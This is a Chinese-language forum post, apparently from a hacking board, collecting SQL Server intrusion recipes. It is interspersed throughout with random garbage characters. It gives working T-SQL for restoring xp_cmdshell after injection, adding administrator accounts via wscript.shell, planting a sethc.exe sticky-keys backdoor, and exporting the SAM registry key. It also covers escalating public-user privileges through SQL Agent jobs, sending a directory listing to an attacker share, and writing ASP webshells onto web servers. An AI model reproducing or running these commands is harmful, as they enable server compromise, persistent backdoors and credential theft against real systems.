1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
# v8 ]' Q& W- f1 b恢复方法:查询分离器连接后,6 D- I/ W3 u2 H3 G) {
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int / U5 t0 c1 o7 l2 `
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 9 I8 I2 o5 F" C/ x
然后按F5键命令执行完毕; k, K! S, z9 O' ?- A2 A
6 V) ?; W0 b/ G- l/ I
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 \3 O y0 A! T7 q) ` S. b恢复方法:查询分离器连接后,
/ x9 b8 \, p4 L" I9 q第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"9 ^( |- @6 m1 N- Q
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; T X9 ]# B$ e/ Y2 q; H
然后按F5键命令执行完毕
; t/ S: k, Y# Y8 @/ V) s4 W4 ] D5 z$ Q
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)1 R3 m e1 \. ?9 B& Z; p Q' p
恢复方法:查询分离器连接后,
/ X1 E8 _6 L+ y8 B第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
4 B" b; R! P. @第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ) }; T! Z5 {. }$ |
然后按F5键命令执行完毕
: O5 S2 w7 k9 K7 O, z. J9 z
3 v, o N) X8 M4 K& _4 h4 终极方法.
7 D+ j8 k% X9 H% X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
" y' z5 ^( m* n* d* g查询分离器连接后,8 Z j: Y4 c( h9 m) P$ t/ g. i* U' B
2000servser系统:7 X6 q0 s2 I" X" o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'7 Q4 e8 \5 v! e7 O( {
5 b7 E; @2 e& ?: G/ t! E/ Q5 b. Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add') X4 P! G0 A5 X2 r1 z
3 z' ~# R: u9 [4 S0 P( @
xp或2003server系统:
& ~; R' }. a2 V- a4 o
: J9 o! m# p. ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
, _% N0 e7 r$ `, ?7 D ^ O% ?7 V* c" }% x( A, M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
/ E6 j# }8 I* U9 q: e' G3 N- x: u2 T- s ]" g! l7 W. B& S
9 t8 L! t) |% U6 G- u五个SHIFT% J6 e1 h4 k7 P$ S
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';8 b7 p7 P. ?7 o+ ~$ X, ?8 E+ a3 B
* f$ _, V1 U( v6 }) \7 P
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
, ~2 f) {+ Q$ b+ O+ _
0 X2 L" Y+ I0 `5 F$ h$ \xp_cmdshell执行命令另一种方法
5 F7 R. D# [: M2 z% e) Edeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
9 r) y: \ t/ N
( u% B+ \* z2 G" [% r/ X( e7 W判断存储扩展是否存在
# S2 `7 i6 i5 g; mSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
3 ]; \' v1 J5 [8 h! s! e6 u; }返回结果为1就OK# T0 x; V. u X5 S' o; N
7 V$ W2 A3 @4 U. O9 a) ~2 {! K0 q$ f1 \. A
上传xplog70.dll恢复xp_cmdshell语句:
, C# e! s, p0 F2 ~; E: ?% q psp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
0 |7 l5 n* o" D7 [1 v1 k" \ k, p/ u- M1 M L s5 Y! K
否则上传xplog7.0.dll Q/ u1 _6 V( I& g
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'1 h" U- h% x0 e& a- t+ b
( P- i. m- w4 a/ H
. |6 n. z2 n% ^1 D
$ q8 B, R- c9 S首先开启沙盘模式:
$ K1 z- q+ \! H: l+ hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! f% H* y2 }. y+ l! c0 A, q* I
# B4 D9 X+ p# A# k然后利用jet.oledb执行系统命令% \3 H# i. q) A3 P4 \
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')4 i3 e; t# [5 t' q, a5 U
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了* q% Z# R& ^) |, Z
' w7 D( @# U$ O: ~3 p s* I
7 z& p! N5 d( q
' i v0 D- Y% }+ ~恢复过程sp_addextendedproc 如下:
, }) J1 b0 V. X) ?7 wcreate procedure sp_addextendedproc --- 1996/08/30 20:13
( e$ f$ H; V/ `) u5 w! }@functname nvarchar(517),/* (owner.)name of function to call */ 6 V" H y4 E- z8 C1 Q, L0 o8 c
@dllname varchar(255)/* name of DLL containing function */
" Y* ~9 U: Q0 k, R) z8 @; m, ?as ) Z( f( \7 ~, H: D6 y
set implicit_transactions off
7 y2 @! C4 f% S' @5 Rif @@trancount > 0
& L6 n" }1 c) n" o# U: Tbegin
$ Q% Z9 n, E% H( B) ~. R8 D; S6 lraiserror(15002,-1,-1,'sp_addextendedproc') 4 ]& Z" D( q5 R# L
return (1) & m+ p8 b5 |% F
end ) F9 g8 F$ V+ w$ O
dbcc addextendedproc( @functname, @dllname)
6 R) I X& E z0 v Y$ @return (0) -- sp_addextendedproc " z" z' b( [% g
GO
% F- K/ U8 K7 \
7 k3 n. _ a- J( P: `5 w( P5 S2 s% I) m% Q0 N( r
. ~, W& I9 ~! m- L导出管理员密码文件% t9 b- O3 E* ]3 R" J. ?: ?9 g
sa默认可以读sam键.应该。
* C# G3 v% p0 c5 ?2 l% ureg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
% ^6 m y o6 A1 Rnet user administrator test# S& s v) Y6 f1 g* @
用administrator登陆. t+ A8 o. v* h5 B' y: e& F
用完机器后
* t+ V! M% c# _9 {reg import c:\test.reg
6 H+ \+ Z d9 b" Y \+ F$ B/ X根本不用克隆.
1 M# @! J _7 V找到对应的sid.
# Z8 ]( {: W" Q- t. P$ x/ O
. E- N. V/ y& E5 A- ^# p) Q; F Y! M2 d
( I O) o9 V9 }, m( H! x
恢复所有存储过程4 u! C+ A& k; I* ^. T
use master
6 u- C% _! O2 `9 H3 F$ B5 }8 }exec sp_addextendedproc xp_enumgroups,'xplog70.dll' " o r6 U6 X) x: @
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' U. ~: E9 h: C9 u9 g4 b" r9 K
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
; O8 K. [7 e: Wexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' ' T! `" `9 e2 K1 D. ?, O# n+ Q/ m
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 2 B1 `* y, o5 ^4 h5 ~% S) g: T
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
8 f8 X+ i" X1 R3 oexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
5 y! o) b0 X1 x, h! l9 Mexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 1 P" a$ o- ~/ G9 L. a& H$ A
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
# u9 S6 J; e7 B* J* oexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
+ O$ l; q- e9 s" ` p; cexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ' }3 k9 v6 }% l- R z
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
" W2 s" x5 R# @! }3 |$ {3 [7 Uexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
% V) r: p* j# I1 ]/ r7 ~% E J Kexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
6 _$ ?$ ]. E" N5 U6 Fexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
% g8 L, A5 [5 Y' I4 ]exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
9 O5 ^: i7 `3 p, V- @exec sp_addextendedproc xp_regread,'xpstar.dll' 8 G- m4 J ?0 m9 \5 D4 Q
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' : T. ?& h) Z1 s# l& R! r( f) ?% Q
exec sp_addextendedproc xp_regwrite,'xpstar.dll' , p: `4 O% {* _5 G |; h
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
9 C: l, m) G# I1 ?* R v" ^) R" I& K. |& A8 I% L$ D0 H2 M
R( }& [/ B+ z- B( W: e建立读文件的存储过程
$ c( p u- P/ }( v Z$ KCreate proc sp_readTextFile @filename sysname
9 l2 {! L# Q6 L8 T+ u5 W3 S' v' @as6 H0 v2 ] U2 E: o
/ n- S( G$ Z$ ~5 o S! H9 ?0 h a- x* y begin % y; y2 i; s) O' J5 z
set nocount on
# Y7 O3 T; Q6 C! J( N Create table #tempfile (line varchar(8000))( J P' l7 N, U+ ] g2 W
exec ('bulk insert #tempfile from "' + @filename + '"')
& z. i6 J3 E9 [# t select * from #tempfile$ [8 A# Q( o7 y. D/ {& k* j( C `
drop table #tempfile% j8 J, D3 |' A8 k6 |, F" x! b
End. n" X# ?8 V" ^2 D% q4 l
, `- \; Z: ^6 {- t: O
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件/ r j0 ~0 c) J5 W5 \. {
查看登录用户% F9 n, P" s: B/ l9 e' _6 @
Select * from sysxlogins; [' y2 W# f# R9 x* k4 l. B6 i8 Q
9 y0 A. R. ]* K* v. l W把文件内容读取到表中
& T0 N0 l, P* O) F7 j8 BBULK INSERT tmp from "c:\test.txt"& ], v6 K7 e4 m
dElete from 表名 清理表里的内容7 i$ d( j) H0 @
create table b_test(fn nvarchar(4000));建一个表,字段为fn
4 Y: M9 r% }, r" m" Y- N( c7 M
0 @, C2 p& b6 O3 j0 r8 k5 {) m* B+ y3 J6 U
加sa用户
- D. Y0 F6 x+ Z7 n- Q+ Bexec master.dbo.sp_addlogin user,pass;; Z3 r5 c% s( f7 W% U
exec master.dbo.sp_addsrvrolemember user,sysadmin" C. Z% Z' l: o
) J7 y7 p/ _- d% @) d
k: Y) T5 q6 @ J, M8 O" k: J1 C2 l% U1 j
读文件代码- s& C' W4 v2 L m& h7 p
declare @o int, @f int, @t int, @ret int
& l3 p9 A4 I' W5 ]2 ~* Ndeclare @line varchar(8000)
5 n& r+ @7 h" u. c' J/ y2 dexec sp_oacreate 'scripting.filesystemobject', @o out/ \% s6 j$ L5 C- \ H: Y2 j. t3 U
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 19 F% Q4 B0 |4 l8 I/ v& B7 l$ b% x) A
exec @ret = sp_oamethod @f, 'readline', @line out
3 x! x' N9 A9 N% xwhile( @ret = 0 )
" `* v( ]' \$ f! o1 abegin
- k$ v5 z. j. r# {7 J$ P2 h3 Xprint @line6 G1 @1 r, N5 i! a" ^- C5 @1 y/ {
exec @ret = sp_oamethod @f, 'readline', @line out- l1 d8 A G2 Y# l4 ^
end; r. o: O+ R; ^8 e- ], H
, [9 e6 X; V7 x/ v$ u* {7 v0 L6 t$ f
" c$ Y5 r: h! p$ d8 z写文件代码:/ V' A1 E6 |! G1 t6 I/ }; p, U
declare @o int, @f int, @t int, @ret int
s% K" A0 _8 d9 L( dexec sp_oacreate 'scripting.filesystemobject', @o out! ]' N8 _* B6 s% Y+ `! @( b a% P! L3 `
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1, {3 q5 @8 l. x! i" `
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
1 Z1 g) B, Q& C0 P# l8 b6 N2 ^7 T/ b& _& V: F3 \& `- w: w* \
; W8 K T) w0 n5 n* W$ b添加lake2 shell
# J+ X2 i" S/ C7 l: U" j/ r, ^, r! Nsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
2 G8 w Q: N. l) F; }' J! k" D4 @1 }' jsp_dropextendedproc xp_lake2( c1 g0 R& }( E2 l, [( d( E
EXEC xp_lake2 'net user'
& B! s: |2 g) M: }
& b! @0 r, g( F- }" ^
" C5 Z+ h. `8 b得到硬盘文件信息 T: h! }3 G4 Q- C
--参数说明:目录名,目录深度,是否显示文件
2 a) i; w3 K0 L1 V. G Q6 g7 nexecute master..xp_dirtree 'c:' ! Q1 C9 w9 p8 r7 R/ e' P* z5 x
execute master..xp_dirtree 'c:',1 6 h7 R% w% a+ `/ ^& n& ?" n
execute master..xp_dirtree 'c:',1,1 , H I8 O) |! J9 u' N$ i2 B
C' x9 H& q) E( _6 @( Q4 a1 T9 B5 f
3 ]+ g- @: l# K* |" J" L6 j读serv-u配置信息
0 m, Z0 b/ Z% xexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'! N6 y. v8 W8 @+ _" P
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
( E0 ^/ A( D5 Z4 A. S6 T4 B9 n# j# [6 m* ]' E
通过xp_regwrite写SHIFT后门* i9 W& \6 ]* S6 [. D1 w/ {
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--: i' `6 F% x# M. z" {
, k2 P9 z+ o t% S1 |5 @, \% L0 y8 Z8 L% Y. N8 E/ _
* B8 S+ p: M* Y2 @2 m' Q4 V
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
1 |4 Q0 i! z9 Kexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了9 P# s% K: n* j2 x) `! K: K0 B9 V
: B3 }+ c7 B9 n) E4 Z
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表' N$ }/ p. w' g4 Y) U3 R. k+ N
/ N: v0 g8 m& j# j/ m
8 G5 ?" i% n& Z
' C) K/ o$ v2 c) E- Bsql server 2005下开启xp_cmdshell的办法
7 P0 M U( U, }$ h' u M3 j( V# Y4 n9 g% w. S; x
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;( L# r1 m7 c6 @! w# X
% q7 g" |" {$ U7 R( H1 n+ d! D
SQL2005开启'OPENROWSET'支持的方法:
- L! q5 A3 m: {8 O) J4 f/ \" w, d1 z! W a% K
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;! t" e; o; @: Z* V5 Q
$ M% L, E% y3 F) r
SQL2005开启'sp_oacreate'支持的方法:
1 p5 Z6 P w0 ]& y( n7 l( J
1 `* s* s; a3 g$ t' Fexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
) u% ]% Y k5 H3 {
8 w5 D: L; ?$ e& f
( | D2 Z+ ?8 r( W
, _+ o5 h) v! c$ M3 p. C5 h+ O3 z. V2 ^! [! l* o) a/ j" u; s
8 O( ~& K( l. q& I9 L2 O" h& \# _" \, ?1 h) j1 t5 {
) D( z5 s0 p# M; t5 y6 i
" y1 x) j& b+ e# C4 H, H I" |* k$ q% i5 e3 E4 Y
! o8 m: {4 T. h+ a- u$ }( i; g, P2 T) T) e0 X. M- w; x+ G% [( Q
: j( h$ u( i/ f' O! s5 Y0 }3 v1 G
( C9 t- D* I* ?8 i. d
: T2 {% q, w9 T3 D; U
Q) r3 Z: a. h; b- q. F7 H' W" G: k) I
5 f0 H5 L8 u7 |: g& W: Y
$ ?3 |* D: o7 a; |
* }* Z0 x! Q& x: ~8 H, i9 E
3 G" x/ n( D3 `
4 F. o0 F3 j# Z( [3 @
* V/ I! s! g' |4 D: ^6 H z- N
6 o. ^% Y8 j. o$ q/ g3 `
, o+ r. V" b% B
以下方面不知道能不能成功暂且留下研究哈:( S5 r' g1 ?, `$ i* p9 y
4)
4 Y; W( z% ` w* e8 C; D% e9 Iuse msdb; --这儿不要是master哟
2 Z/ }: {, A. d# K; `exec sp_add_job @job_name= czy82 ;" } l% {* k/ l3 Z
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
0 w6 b* W% ~! [; M7 A, t/ Y6 [exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
3 C1 M: f( @, O; Y* b( ]! ?1 Xexec sp_start_job @job_name= czy82 ;
% O6 j' X. U: z1 E3 v2 E0 S* @7 E, i; g! R
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
; h) _+ \! V. H" X执行tsql语句了.$ Q: f1 T$ o7 p2 C7 Z) g, V
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名' j) g3 d5 Y# } Y
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧); j" G& s4 g% n9 n( i
net start SQLSERVERAGENT, M: ^/ d+ N: W3 k. I
. ^( i/ e- b% V+ [& v/ x
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的5 ]( W4 z" G) s$ l$ C( O
USE msdb- [5 `" c; v8 ^+ I$ G- \, R
EXEC sp_add_job @job_name = GetSystemOnSQL ,
! V4 }5 ?- @) `+ M0 _% f8 h@enabled = 1,* \, D/ s0 t9 h4 R! W
@description = This will give a low privileged user access to
3 I- A! S, e5 _( k( txp_cmdshell ,. M5 V8 S$ i' U P% R
@delete_level = 1
; G' `, L9 y- w1 r" u7 \0 REXEC sp_add_jobstep @job_name = GetSystemOnSQL ,2 C C R* ] Y# Y0 Y# {
@step_name = Exec my sql ,2 @% h4 q8 |- I; v
@subsystem = TSQL ,' a' u1 F8 d8 G4 m& S2 r) S
@command = exec master..xp_execresultset N select exec5 L0 T$ e. c" f' m. m& g+ H1 Q% D
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master / o( E$ S+ t1 M% L: ]# l
EXEC sp_add_jobserver @job_name = GetSystemOnSQL , u) ~. B, p2 W1 G
@server_name = 你的SQL的服务器名
5 c1 D: o: H8 _3 Y& bEXEC sp_start_job @job_name = GetSystemOnSQL % z" N5 {' P4 N, l; L" H( o
u) H" f: ^+ |- p/ |0 a- C: P2 Y, U: f; O
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以3 u5 v- @8 H# Y
才让我们可以以public执行xp_cmdshell3 r( [7 j4 F v3 s0 X& d
6 e. O1 e. |- `+ ]2 ?, E5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)3 @& ~9 b' `/ t) `% x
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968/ |+ a2 {9 F& [! j$ }; \! k( ]
9 c. R+ x+ s( ?
USE msdb
- M5 o# q1 ^, z+ M( BEXEC sp_add_job @job_name = ArbitraryFilecreate ,
# V5 S U! x. U0 e@enabled = 1, h' {/ L8 M) F4 f; i" w: I3 F
@description = This will create a file called c:\sqlafc123.txt ,1 N1 F1 X0 M4 }; s& p
@delete_level = 1
6 ^ R* M: {5 NEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,4 m# o+ [- h6 ~" c
@step_name = SQLAFC ,) d" Q+ p. Z. J, i8 E% d" `
@subsystem = TSQL ,
4 w, {- Y$ h) H@command = select hello, this file was created by the SQL Agent. ,$ ?7 \, B' ]9 @/ |7 @3 q, P3 o
@output_file_name = c:\sqlafc123.txt
3 B. q4 l4 z+ H6 u% I" D8 H" I. sEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
& @7 @2 f. H7 N( g9 E6 v- z' ^1 K; ~@server_name = SERVER_NAME
$ K" o2 `3 c9 P9 f4 S" qEXEC sp_start_job @job_name = ArbitraryFilecreate
! S, N! P) k1 z; W# ]' b
) S/ g4 S2 F7 Y ^8 @2 H如果subsystem选的是:tsql,在生成的文件的头部有如下内容; F. V6 T# l4 }2 l
5 G$ T# g, x0 a8 K& p4 \& W
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
6 ?9 c$ b8 s8 j$ U----------------------------------------------
) N3 G7 g/ v' _6 N& s. x, ^$ Ghello, this file was created by the SQL Agent.+ s0 u2 e% y; k) D4 c
9 L. _: U3 }! z3 U& w- V
(1 ?????)
# a+ G7 ~! D0 z( [7 m7 y4 J. P2 d
8 \+ D& k9 j8 |& K所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
% i6 w& |$ g1 [, B命令的vbs文件到启动目录!
0 P/ G5 ~- r; z- L/ N: ]8 S2 o7 Q2 O4 V( D) R* a7 E) w" I
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)2 p( W2 x4 Q! F
关于sp_MScopyscriptfile 看下面的例子4 L( _) N7 N2 E E) T! K4 r* r D6 c
declare @command varchar(100) ' L5 I" \! _+ R; l+ b7 i0 X' e
declare @scripfile varchar(200) 9 N8 ]/ _% T8 v
set concat_null_yields_null off ! N" u `# z" p' m e& ~9 x
select @command= dir c:\ > "\\attackerip\share\dir.txt" 3 D8 D% e4 o" F) F
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
0 M6 ^% g6 |2 [# yexec sp_MScopyscriptfile @scripfile ,
& S5 Y ?' u6 {1 _# q5 w- [1 G* F7 c* Z2 S m
这两个东东都还在测试试哟
- H5 D/ S. Z7 M4 l7 ^让MSSQL的public用户得到一个本机的web shell / }6 h3 j Q/ G5 K' H
1 d; a9 p. z- M" j- L: q8 l
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,9 S; U, Q* P. a& \' v- I3 t# [ n
--@query= select <img src=vbscript:msgbox(now())> / X0 N+ u* Y" x3 `' l: c" k2 [
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
" J' C' W0 _$ c E@query= select * C- w; n A1 t/ d! G$ g* c4 u
<%On Error Resume Next ! I( D( H8 K0 S" q3 e
Set oscript = Server.createObject("wscript.SHELL") / t2 U, e$ R) f5 X( c0 h# ?7 _8 K
Set oscriptNet = Server.createObject("wscript.NETWORK") 4 Y7 `1 P f1 J% Y
Set oFileSys = Server.createObject("scripting.FileSystemObject") / c2 B$ V5 x$ ?
szCMD = Request.Form(".CMD")
* Z# l* [- x5 O' UIf (szCMD <>"")Then 3 T2 u0 O# H: r+ u* k& a
szTempFile = "C:\" & oFileSys.GetTempName() * q+ @! w$ d. y7 n# l
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) / M! I" {! J* c' v6 U3 y
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) . E j4 T7 E7 n x8 G0 W2 c
End If %>
+ ]3 H& }. a* w( Z4 o<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> $ `$ o6 H, X0 i6 Y6 A7 [! S: I
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
6 j6 n. \0 i1 O+ ]: e: \. E' y</FORM><RE>
1 d5 k8 U0 z* }8 R8 c<% If (IsObject(oFile))Then 2 C p8 T0 R4 q: B( x
On Error Resume Next 4 t! U# V, b2 _4 ]3 l5 R( z8 p
Response.Write Server.HTMLEncode(oFile.ReadAll) 0 s, p& u! h( Q
oFile.Close / r5 u9 X) {- M
Call oFileSys.deleteFile(szTempFile, True)
0 R, b! x$ z$ ]" ]* W! ^End If%>
8 P6 U) k- L& S. _' U- V4 D</BODY></HTML> # M$ `2 M8 v- X _* T
|
发表于 2012-9-15 14:37:30
收藏
支持
反对